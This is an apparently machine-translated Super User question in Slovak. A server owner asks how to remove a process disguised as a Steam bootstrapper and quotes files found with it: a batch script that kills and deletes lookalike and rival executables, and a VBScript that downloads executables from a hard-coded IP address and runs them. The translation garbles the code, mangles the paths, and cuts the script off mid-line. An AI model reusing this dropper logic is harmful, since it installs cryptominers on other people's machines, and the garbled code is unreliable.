windows - Ako natrvalo zabiť parného klienta bootstrapper - Super User
V správcovi úloh mám nasledujúcu situáciu:
Neviem, aký typ aplikácie je, ale rozhodne nie parný klient bootstrapper, pretože som ho nenainštaloval a tiež ho nemožno odinštalovať.
Vidím niečo takéto:
V programe MS Config som nenašiel nič, čo vyzerá ako secury.exe.
Keď otvorím umiestnenie súboru, zobrazia sa tri súbory:
m.bat, b.exe, 4.vbs.
Nižšie je uvedený obsah m.bat:
taskkill / f / t / im secury.exe c: Programové súbory secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Proces.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: Windows 32 C: Windows TrustedInstaller.exe del C: Program Datasoft.exe del C: DataData expl0rer.exe del C: ProgramData iplare.exe del C: ProgramData nssm.exe del C: ProgramData MSASCui.exe del C: Pre gramData SystemSettlngs.exe del C: ProgramData SystemSetting.exe del C: ProgramData Program.exe del C: Programy winlnlt.exe del C: ProgramData Program Windows Vista.exe del C: ProgramData del C: ProgramDiddlere.exe del C: DataData stst.exe del C: DataData qqqq.exe del C: ProgramData apkls.exe del C: ProgramData winlog.exe del C: ProgramData svchosts.exe del C: ProgramData win1ogins.exe del C: DataData setsts.exe del C: ProgramData fcty.exe del C: ProgramData pool.exe del C: ProgramData C: \ ProgramData \ pool3.exe
Nasleduje 4.vbs:
Nastavte xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Nastavte sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: Program Data2 s2.exe", 2 Nastaviť xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Nastaviť sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: DataData2.exe", 2 CreateObject ("WScript.Shell") Spustiť "C: Program Data3.exe" CreateObject ( "WScript.Shell") Spustite "del C: ProgramData \ t
Čo môžem urobiť, aby som zastavil secury.exe pred zneužívaním výpočtových právomocí môjho servera?
PS Popravil som Avast úplnú kontrolu môjho počítača, ale nenašiel som nič zlé.
Exe pred zneužívaním výpočtových právomocí môjho servera?